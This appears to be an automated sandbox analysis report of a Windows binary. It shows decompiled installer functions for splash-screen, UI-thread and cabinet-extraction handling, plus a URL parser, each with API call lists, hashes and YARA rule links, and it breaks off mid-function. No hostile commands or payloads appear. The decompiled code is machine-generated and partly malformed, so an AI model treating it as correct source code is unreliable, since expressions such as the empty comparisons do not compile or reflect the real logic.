                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                                  • String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                                                                                                                                  • API String ID: 2351989216-3599963359
                                                                                                                                                                  • Opcode ID: fd98d1b9d4451c8462368cd899169b825afd00b0aa59a0a7411517b82cc425b3
                                                                                                                                                                  • Instruction ID: 9ac4460ed46012822f6b7fe948cc426e85b9e290d1e74395d8818fd98736773c
                                                                                                                                                                  • Opcode Fuzzy Hash: fd98d1b9d4451c8462368cd899169b825afd00b0aa59a0a7411517b82cc425b3
                                                                                                                                                                  • Instruction Fuzzy Hash: BA315275E04215BFEB109FA98D84A9FBAF8EB08350F114166B905F3250D7349D018AE5
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00417453, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 94threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 57%
                                                                                                                                                                  			E00417453(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				long _v8;
				int _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void _v32;
				void* _t23;
				void* _t29;
				int _t31;
				void* _t47;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				_t23 = CreateEventW(0, 1, 0, 0);
				_v16 = _t23;
				if(_t23 != 0) {
					_v32 = _t23;
					_v28 = _a4;
					_v24 = _a8;
					_v20 = _a12;
					_t29 = CreateThread(0, 0, E004171DA,  &_v32, 0,  &_v8);
					_v12 = _t29;
					if(_t29 != 0) {
						_t31 = WaitForMultipleObjects(2,  &_v16, 0, 0xffffffff);
					} else {
						_t46 =  <=  ? GetLastError() : _t33 & 0x0000ffff | 0x80070000;
						_t47 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t33 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "splashscreen.cpp", 0x4d, _t47);
						_push("Failed to create UI thread.");
						goto L4;
					}
				} else {
					_t50 =  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
					_t47 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t36 & 0x0000ffff | 0x80070000;
					E004300D9(0x80004005, "splashscreen.cpp", 0x44, _t47);
					_push("Failed to create modal event.");
					L4:
					_push(_t47);
					_t31 = E00430A57();
				}
				if(_v12 != 0) {
					_t31 = CloseHandle(_v12);
					_v12 = 0;
				}
				if(_v16 != 0) {
					return CloseHandle(_v16);
				}
				return _t31;
			}














                                                                                                                                                                  0x00417460
                                                                                                                                                                  0x00417461
                                                                                                                                                                  0x00417462
                                                                                                                                                                  0x00417463
                                                                                                                                                                  0x0041746b
                                                                                                                                                                  0x0041746e
                                                                                                                                                                  0x00417471
                                                                                                                                                                  0x00417474
                                                                                                                                                                  0x0041747a
                                                                                                                                                                  0x0041747f
                                                                                                                                                                  0x004174b3
                                                                                                                                                                  0x004174b9
                                                                                                                                                                  0x004174bf
                                                                                                                                                                  0x004174c5
                                                                                                                                                                  0x004174d8
                                                                                                                                                                  0x004174de
                                                                                                                                                                  0x004174e3
                                                                                                                                                                  0x00417528
                                                                                                                                                                  0x004174e5
                                                                                                                                                                  0x004174f6
                                                                                                                                                                  0x00417500
                                                                                                                                                                  0x0041750b
                                                                                                                                                                  0x00417510
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00417510
                                                                                                                                                                  0x00417481
                                                                                                                                                                  0x00417492
                                                                                                                                                                  0x0041749c
                                                                                                                                                                  0x004174a7
                                                                                                                                                                  0x004174ac
                                                                                                                                                                  0x00417515
                                                                                                                                                                  0x00417515
                                                                                                                                                                  0x00417516
                                                                                                                                                                  0x0041751c
                                                                                                                                                                  0x00417537
                                                                                                                                                                  0x0041753c
                                                                                                                                                                  0x0041753e
                                                                                                                                                                  0x0041753e
                                                                                                                                                                  0x00417544
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00417549
                                                                                                                                                                  0x0041754e

                                                                                                                                                                  APIs
                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00401EA4,?,?), ref: 00417474
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00401EA4,?,?), ref: 00417481
                                                                                                                                                                  • CreateThread.KERNEL32 ref: 004174D8
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00401EA4,?,?), ref: 004174E5
                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00401EA4,?,?), ref: 00417528
                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00401EA4,?,?), ref: 0041753C
                                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,00401EA4,?,?), ref: 00417549
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                                  • String ID: Failed to create UI thread.$Failed to create modal event.$splashscreen.cpp
                                                                                                                                                                  • API String ID: 2351989216-1977201954
                                                                                                                                                                  • Opcode ID: 5a8e3259315ac60360532cdaafb0d41cbd600b92a9ac9cabfe9b18923f033d2e
                                                                                                                                                                  • Instruction ID: 52425e94ceacc81ac1de744fa91a9ef76b0a73159505ea0f13b269174744517f
                                                                                                                                                                  • Opcode Fuzzy Hash: 5a8e3259315ac60360532cdaafb0d41cbd600b92a9ac9cabfe9b18923f033d2e
                                                                                                                                                                  • Instruction Fuzzy Hash: 72317375D00215BEEB109FA9DC05BEFBBF8EF44750F104127ED11F2250E7388A418AA9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00423E70, Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 89threadCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 56%
                                                                                                                                                                  			E00423E70(intOrPtr _a4) {
				long _v8;
				int _v12;
				void* _v16;
				long _t22;
				intOrPtr _t52;

				_t52 = _a4;
				_v16 = 0;
				_v16 =  *(_t52 + 0x28);
				_v12 = 0;
				_v12 =  *(_t52 + 0x20);
				_v8 = 0;
				_t22 = WaitForMultipleObjects(2,  &_v16, 0, 0xffffffff);
				if(_t22 == 0) {
					if(ResetEvent( *(_t52 + 0x28)) != 0) {
						 *((intOrPtr*)(_t52 + 0x2c)) = 0;
					} else {
						_t39 =  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
						_t40 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
						_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t25 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "cabextract.cpp", 0x149, _t40);
						_push("Failed to reset operation complete event.");
						goto L3;
					}
				} else {
					if(_t22 == 1) {
						if(GetExitCodeThread( *(_t52 + 0x20),  &_v8) == 0) {
							_t45 =  <=  ? GetLastError() : _t31 & 0x0000ffff | 0x80070000;
							_t46 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t31 & 0x0000ffff | 0x80070000;
							_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t31 & 0x0000ffff | 0x80070000;
							E004300D9(0x80004005, "cabextract.cpp", 0x150, _t46);
							_push("Failed to get extraction thread exit code.");
							goto L3;
						}
					} else {
						_t49 =  <=  ? GetLastError() : _t34 & 0x0000ffff | 0x80070000;
						_t50 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t34 & 0x0000ffff | 0x80070000;
						_v8 =  >=  ? 0x80004005 :  <=  ? GetLastError() : _t34 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "cabextract.cpp", 0x156, _t50);
						_push("Failed to wait for operation complete event.");
						L3:
						_push(_v8);
						E00430A57();
					}
				}
				return _v8;
			}








                                                                                                                                                                  0x00423e77
                                                                                                                                                                  0x00423e80
                                                                                                                                                                  0x00423e83
                                                                                                                                                                  0x00423e8b
                                                                                                                                                                  0x00423e8e
                                                                                                                                                                  0x00423e98
                                                                                                                                                                  0x00423e9b
                                                                                                                                                                  0x00423ea3
                                                                                                                                                                  0x00423f4b
                                                                                                                                                                  0x00423f88
                                                                                                                                                                  0x00423f4d
                                                                                                                                                                  0x00423f5e
                                                                                                                                                                  0x00423f68
                                                                                                                                                                  0x00423f76
                                                                                                                                                                  0x00423f79
                                                                                                                                                                  0x00423f7e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00423f7e
                                                                                                                                                                  0x00423ea9
                                                                                                                                                                  0x00423eac
                                                                                                                                                                  0x00423f02
                                                                                                                                                                  0x00423f19
                                                                                                                                                                  0x00423f23
                                                                                                                                                                  0x00423f31
                                                                                                                                                                  0x00423f34
                                                                                                                                                                  0x00423f39
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00423f39
                                                                                                                                                                  0x00423eae
                                                                                                                                                                  0x00423ebf
                                                                                                                                                                  0x00423ec9
                                                                                                                                                                  0x00423ed7
                                                                                                                                                                  0x00423eda
                                                                                                                                                                  0x00423edf
                                                                                                                                                                  0x00423ee4
                                                                                                                                                                  0x00423ee4
                                                                                                                                                                  0x00423ee7
                                                                                                                                                                  0x00423eed
                                                                                                                                                                  0x00423eac
                                                                                                                                                                  0x00423f91

                                                                                                                                                                  APIs
                                                                                                                                                                  • WaitForMultipleObjects.KERNEL32(00000002,0040227F,00000000,000000FF,00000001,7519F5E0,0040227F,00000001,004021A7,00401DDF,00000000,00401E67,00401E27,?,00401E67,WixBundleElevated), ref: 00423E9B
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00423EAE
                                                                                                                                                                  • GetExitCodeThread.KERNEL32(?,?,?,?,00000000), ref: 00423EFA
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00423F08
                                                                                                                                                                  • ResetEvent.KERNEL32(?,?,?,00000000), ref: 00423F43
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000), ref: 00423F4D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                                                                                                                  • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                                                                                                                                  • API String ID: 2979751695-3400260300
                                                                                                                                                                  • Opcode ID: 29f12b3261cb8a272b9ac3798d736ed00ad88194cac59c05bd7bd6e63a9c967e
                                                                                                                                                                  • Instruction ID: 7dd3a8fcb979c9927223fb3ff549ed4768c5b3eabb76901c8a89c0ea74aea91f
                                                                                                                                                                  • Opcode Fuzzy Hash: 29f12b3261cb8a272b9ac3798d736ed00ad88194cac59c05bd7bd6e63a9c967e
                                                                                                                                                                  • Instruction Fuzzy Hash: DA318471B00310AFEB18DF7AAD15B7EB6F4EF08711F10416FE946E61A0D7B9D9009A58
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00423F94, Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 80synchronizationCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 59%
                                                                                                                                                                  			E00423F94(void* __ebx, intOrPtr _a4) {
				signed short _t30;
				signed short _t34;
				void* _t37;
				void* _t42;
				intOrPtr _t49;

				_t37 = __ebx;
				_t49 = _a4;
				_t42 = 0;
				if( *(_t49 + 0x20) != 0) {
					_t3 = _t49 + 0x24; // 0xc3e8
					 *((intOrPtr*)(_t49 + 0x2c)) = 5;
					if(SetEvent( *_t3) != 0) {
						_t5 = _t49 + 0x20; // 0x26aa000
						if(WaitForSingleObject( *_t5, 0xffffffff) != 0) {
							_t30 = GetLastError();
							_t45 =  <=  ? _t30 : _t30 & 0x0000ffff | 0x80070000;
							_t42 =  >=  ? 0x80004005 :  <=  ? _t30 : _t30 & 0x0000ffff | 0x80070000;
							E004300D9(0x80004005, "cabextract.cpp", 0x116, _t42);
							_push("Failed to wait for thread to terminate.");
							goto L5;
						}
					} else {
						_t34 = GetLastError();
						_t48 =  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
						_t42 =  >=  ? 0x80004005 :  <=  ? _t34 : _t34 & 0x0000ffff | 0x80070000;
						E004300D9(0x80004005, "cabextract.cpp", 0x110, _t42);
						_push("Failed to set begin operation event.");
						L5:
						_push(_t42);
						E00430A57();
					}
				}
				_push(_t37);
				if( *(_t49 + 0x20) != 0) {
					_t7 = _t49 + 0x20; // 0x26aa000
					CloseHandle( *_t7);
					 *(_t49 + 0x20) =  *(_t49 + 0x20) & 0x00000000;
				}
				if( *(_t49 + 0x24) != 0) {
					_t11 = _t49 + 0x24; // 0xc3e8
					CloseHandle( *_t11);
					 *(_t49 + 0x24) =  *(_t49 + 0x24) & 0x00000000;
				}
				if( *(_t49 + 0x28) != 0) {
					_t15 = _t49 + 0x28; // 0xcc48300
					CloseHandle( *_t15);
					 *(_t49 + 0x28) =  *(_t49 + 0x28) & 0x00000000;
				}
				if( *((intOrPtr*)(_t49 + 0x4c)) != 0) {
					_t19 = _t49 + 0x4c; // 0xc0bd8300
					E00431137( *_t19);
				}
				if( *((intOrPtr*)(_t49 + 0x1c)) != 0) {
					_t21 = _t49 + 0x1c; // 0x86850
					E004380AB( *_t21);
				}
				return _t42;
			}








                                                                                                                                                                  0x00423f94
                                                                                                                                                                  0x00423f98
                                                                                                                                                                  0x00423f9c
                                                                                                                                                                  0x00423fa1
                                                                                                                                                                  0x00423fa7
                                                                                                                                                                  0x00423faa
                                                                                                                                                                  0x00423fb9
                                                                                                                                                                  0x00423ff2
                                                                                                                                                                  0x00423ffd
                                                                                                                                                                  0x00423fff
                                                                                                                                                                  0x00424010
                                                                                                                                                                  0x0042401a
                                                                                                                                                                  0x00424028
                                                                                                                                                                  0x0042402d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0042402d
                                                                                                                                                                  0x00423fbb
                                                                                                                                                                  0x00423fbb
                                                                                                                                                                  0x00423fcc
                                                                                                                                                                  0x00423fd6
                                                                                                                                                                  0x00423fe4
                                                                                                                                                                  0x00423fe9
                                                                                                                                                                  0x00424032
                                                                                                                                                                  0x00424032
                                                                                                                                                                  0x00424033
                                                                                                                                                                  0x00424039
                                                                                                                                                                  0x00423fb9
                                                                                                                                                                  0x0042403e
                                                                                                                                                                  0x00424045
                                                                                                                                                                  0x00424047
                                                                                                                                                                  0x0042404a
                                                                                                                                                                  0x0042404c
                                                                                                                                                                  0x0042404c
                                                                                                                                                                  0x00424054
                                                                                                                                                                  0x00424056
                                                                                                                                                                  0x00424059
                                                                                                                                                                  0x0042405b
                                                                                                                                                                  0x0042405b
                                                                                                                                                                  0x00424063
                                                                                                                                                                  0x00424065
                                                                                                                                                                  0x00424068
                                                                                                                                                                  0x0042406a
                                                                                                                                                                  0x0042406a
                                                                                                                                                                  0x00424073
                                                                                                                                                                  0x00424075
                                                                                                                                                                  0x00424078
                                                                                                                                                                  0x00424078
                                                                                                                                                                  0x00424081
                                                                                                                                                                  0x00424083
                                                                                                                                                                  0x00424086
                                                                                                                                                                  0x00424086
                                                                                                                                                                  0x00424090

                                                                                                                                                                  APIs
                                                                                                                                                                  • SetEvent.KERNEL32(0000C3E8,00401F17,00000000,?,00418E8C,00401F17,00401DDF,00000000,?,0041175B,?,00401E9B,00401E9B,00000000,?,00401EAB), ref: 00423FB1
                                                                                                                                                                  • GetLastError.KERNEL32(?,00418E8C,00401F17,00401DDF,00000000,?,0041175B,?,00401E9B,00401E9B,00000000,?,00401EAB,00FFFFFD,00401EAB,?), ref: 00423FBB
                                                                                                                                                                  • WaitForSingleObject.KERNEL32(026AA000,000000FF,?,00418E8C,00401F17,00401DDF,00000000,?,0041175B,?,00401E9B,00401E9B,00000000,?,00401EAB,00FFFFFD), ref: 00423FF5
                                                                                                                                                                  • GetLastError.KERNEL32(?,00418E8C,00401F17,00401DDF,00000000,?,0041175B,?,00401E9B,00401E9B,00000000,?,00401EAB,00FFFFFD,00401EAB,?), ref: 00423FFF
                                                                                                                                                                  • CloseHandle.KERNEL32(026AA000,00402077,00401F17,00000000,?,00418E8C,00401F17,00401DDF,00000000,?,0041175B,?,00401E9B,00401E9B,00000000,?), ref: 0042404A
                                                                                                                                                                  • CloseHandle.KERNEL32(0000C3E8,00402077,00401F17,00000000,?,00418E8C,00401F17,00401DDF,00000000,?,0041175B,?,00401E9B,00401E9B,00000000,?), ref: 00424059
                                                                                                                                                                  • CloseHandle.KERNEL32(0CC48300,00402077,00401F17,00000000,?,00418E8C,00401F17,00401DDF,00000000,?,0041175B,?,00401E9B,00401E9B,00000000,?), ref: 00424068
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CloseHandle$ErrorLast$EventObjectSingleWait
                                                                                                                                                                  • String ID: Failed to set begin operation event.$Failed to wait for thread to terminate.$cabextract.cpp
                                                                                                                                                                  • API String ID: 1206859064-226982402
                                                                                                                                                                  • Opcode ID: c2ef122659c3f77878c76b58dfaedbd9290e5668f8d3a3b98ba76395c94414b7
                                                                                                                                                                  • Instruction ID: e325be36e0612aa1a1750bc1d43e979310d8036499d26b7013f321fa6cd8128c
                                                                                                                                                                  • Opcode Fuzzy Hash: c2ef122659c3f77878c76b58dfaedbd9290e5668f8d3a3b98ba76395c94414b7
                                                                                                                                                                  • Instruction Fuzzy Hash: 3921D3322007109BE7315B26EC09B57B6F1FF88755F11062EFA8A915A0D77DE440DA6C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 100212F0, Relevance: 16.7, APIs: 11, Instructions: 232COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E100212F0(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24) {
				char _v8;
				char _v12;
				char* _v16;
				char* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v35;
				char _v39;
				char _v43;
				char _v44;
				void* _t86;
				void* _t88;
				intOrPtr _t91;
				void* _t92;
				void* _t120;
				void* _t140;
				void* _t141;
				void* _t191;
				void* _t192;
				void* _t193;
				void* _t194;
				void* _t195;
				void* _t196;

				_t192 = __esi;
				_t191 = __edi;
				_t141 = __ebx;
				_v32 = 0;
				_v20 = "https://";
				_v16 = "http://";
				_v12 = 0;
				_v8 = 0;
				_v28 = 0;
				_v24 = 0;
				_v44 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_t86 = E10001A50(_a4, _v20);
				_t194 = _t193 + 8;
				if(_t86 != 0) {
					L2:
					_v8 = _a4;
					_t88 = E10001A50(_a4, _v20);
					_t195 = _t194 + 8;
					if(_t88 == 0) {
						 *_a8 = 0;
						_v8 = _v8 + 7;
						 *_a20 = 0x50;
					} else {
						 *_a8 = 1;
						_v8 = _v8 + 8;
						 *_a20 = 0x1bb;
					}
					_t91 = E10001A50(_v8, "/");
					_t196 = _t195 + 8;
					_v28 = _t91;
					if(_v28 == 0) {
						_t92 = E1000CAD0(_v8);
						_t196 = _t196 + 4;
						_v24 = _t92 + 1;
					} else {
						_v24 = _v28 - _v8 + 1;
					}
					 *_a12 = L1000CEAF(_t141, _v24, _t191, _t192, _v24);
					E1000CF80(_t191,  *_a12, 0, _v24);
					E1000D1F0(_t141, _t191, _t192,  *_a12, _v8, _v24 - 1);
					_v28 = E10001A50(_v8, "/");
					if(_v28 == 0) {
						_v24 = 2;
						 *_a24 = L1000CEAF(_t141, _v24, _t191, _t192, _v24);
						E1000CF80(_t191,  *_a24, 0, _v24);
						E1000E2E0( *_a24, "/");
					} else {
						_v24 = E1000CAD0(_v8) - _v28 - _v8 + 1;
						 *_a24 = L1000CEAF(_t141, _v28 - _v8, _t191, _t192, _v24);
						E1000CF80(_t191,  *_a24, 0, _v24);
						E1000E2E0( *_a24, _v28);
					}
					_v8 = E10001A50( *_a12, ":");
					if(_v8 == 0) {
						_t181 = _a12;
						_v24 = E1000CAD0( *_a12) + 1;
					} else {
						_v24 = _v8 -  *_a12 + 1;
						_t120 = E1000CAD0( *_a12);
						_t181 =  &_v44;
						E1000D1F0(_t141, _t191, _t192,  &_v44, _v8 + 1, _t120 - _v24);
						E1000E645( &_v44, "%d", _a20);
					}
					 *_a16 = L1000CEAF(_t141, _t181, _t191, _t192, _v24);
					E1000CF80(_t191,  *_a16, 0, _v24);
					E1000D1F0(_t141, _t191, _t192,  *_a16,  *_a12, _v24 - 1);
					_v32 = 1;
				} else {
					_t140 = E10001A50(_a4, _v16);
					_t194 = _t194 + 8;
					if(_t140 != 0) {
						goto L2;
					}
				}
				return _v32;
			}



























                                                                                                                                                                  0x100212f0
                                                                                                                                                                  0x100212f0
                                                                                                                                                                  0x100212f0
                                                                                                                                                                  0x100212f6
                                                                                                                                                                  0x100212fd
                                                                                                                                                                  0x10021304
                                                                                                                                                                  0x1002130b
                                                                                                                                                                  0x10021312
                                                                                                                                                                  0x10021319
                                                                                                                                                                  0x10021320
                                                                                                                                                                  0x10021327
                                                                                                                                                                  0x1002132d
                                                                                                                                                                  0x10021330
                                                                                                                                                                  0x10021333
                                                                                                                                                                  0x1002133e
                                                                                                                                                                  0x10021343
                                                                                                                                                                  0x10021348
                                                                                                                                                                  0x10021362
                                                                                                                                                                  0x10021365
                                                                                                                                                                  0x10021370
                                                                                                                                                                  0x10021375
                                                                                                                                                                  0x1002137a
                                                                                                                                                                  0x1002139c
                                                                                                                                                                  0x100213a8
                                                                                                                                                                  0x100213ae
                                                                                                                                                                  0x1002137c
                                                                                                                                                                  0x1002137f
                                                                                                                                                                  0x1002138b
                                                                                                                                                                  0x10021391
                                                                                                                                                                  0x10021391
                                                                                                                                                                  0x100213bd
                                                                                                                                                                  0x100213c2
                                                                                                                                                                  0x100213c5
                                                                                                                                                                  0x100213cc
                                                                                                                                                                  0x100213e0
                                                                                                                                                                  0x100213e5
                                                                                                                                                                  0x100213eb
                                                                                                                                                                  0x100213ce
                                                                                                                                                                  0x100213d7
                                                                                                                                                                  0x100213d7
                                                                                                                                                                  0x100213fd
                                                                                                                                                                  0x1002140b
                                                                                                                                                                  0x10021424
                                                                                                                                                                  0x1002143d
                                                                                                                                                                  0x10021444
                                                                                                                                                                  0x10021499
                                                                                                                                                                  0x100214af
                                                                                                                                                                  0x100214bd
                                                                                                                                                                  0x100214d0
                                                                                                                                                                  0x10021446
                                                                                                                                                                  0x1002145d
                                                                                                                                                                  0x1002146f
                                                                                                                                                                  0x1002147d
                                                                                                                                                                  0x1002148f
                                                                                                                                                                  0x10021494
                                                                                                                                                                  0x100214eb
                                                                                                                                                                  0x100214f2
                                                                                                                                                                  0x1002153e
                                                                                                                                                                  0x1002154f
                                                                                                                                                                  0x100214f4
                                                                                                                                                                  0x100214ff
                                                                                                                                                                  0x10021508
                                                                                                                                                                  0x1002151b
                                                                                                                                                                  0x1002151f
                                                                                                                                                                  0x10021534
                                                                                                                                                                  0x10021539
                                                                                                                                                                  0x10021561
                                                                                                                                                                  0x1002156f
                                                                                                                                                                  0x1002158a
                                                                                                                                                                  0x10021592
                                                                                                                                                                  0x1002134a
                                                                                                                                                                  0x10021352
                                                                                                                                                                  0x10021357
                                                                                                                                                                  0x1002135c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x1002135c
                                                                                                                                                                  0x1002159f

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.262855383.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.262835184.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.262897307.0000000010024000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263335901.0000000010334000.00000004.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263350546.0000000010339000.00000002.00000001.sdmp Download File
                                                                                                                                                                  • Associated: 00000000.00000002.263388757.000000001033A000.00000004.00000001.sdmp Download File
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _memset_strlen$_strcat$_sscanf_vscan_fn
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3056589307-0
                                                                                                                                                                  • Opcode ID: 403152bf92db43274024c9a4f77463d3bbea5a1632cdc500d382b8df9f3c8fe4
                                                                                                                                                                  • Instruction ID: 4b51f2b05251f5ad84218d7a5ee60ac0fbdcfae77a21dec9d6b54221d6e01b8d
                                                                                                                                                                  • Opcode Fuzzy Hash: 403152bf92db43274024c9a4f77463d3bbea5a1632cdc500d382b8df9f3c8fe4
                                                                                                                                                                  • Instruction Fuzzy Hash: 82912BF9E00209EFDB04CFA4D981AEFB7B5EF48344F104568E905AB345E635EA14CBA1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 0041737C, Relevance: 16.6, APIs: 11, Instructions: 86windowCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E0041737C(void** _a4, int _a8, int _a12, long _a16) {
				void* _t16;
				void* _t19;
				long _t28;
				struct HDC__* _t32;
				void* _t35;
				void* _t36;
				void* _t38;
				void* _t39;
				struct HWND__* _t41;
				void** _t43;
				long _t45;

				_t41 = _a4;
				_t43 = GetWindowLongW(_t41, 0xffffffeb);
				_t16 = 2;
				_a4 = _t43;
				_t35 = _a8 - _t16;
				if(_t35 == 0) {
					PostQuitMessage(0);
					return 0;
				}
				_t36 = _t35 - 0x12;
				if(_t36 == 0) {
					_t32 = CreateCompatibleDC(_a12);
					_t19 = SelectObject(_t32,  *_t43);
					StretchBlt(_a12, 0, 0, _a4[3], _a4[4], _t32, 0, 0,  *(_t20 + 0xc),  *(_t20 + 0x10), 0xcc0020);
					SelectObject(_t32, _t19);
					DeleteDC(_t32);
					return 1;
				}
				_t45 = _a16;
				_t38 = _t36 - 0x6d;
				if(_t38 == 0) {
					SetWindowLongW(_t41, 0xffffffeb,  *_t45);
					L8:
					return DefWindowProcW(_t41, _a8, _a12, _t45);
				}
				_t39 = _t38 - 1;
				if(_t39 == 0) {
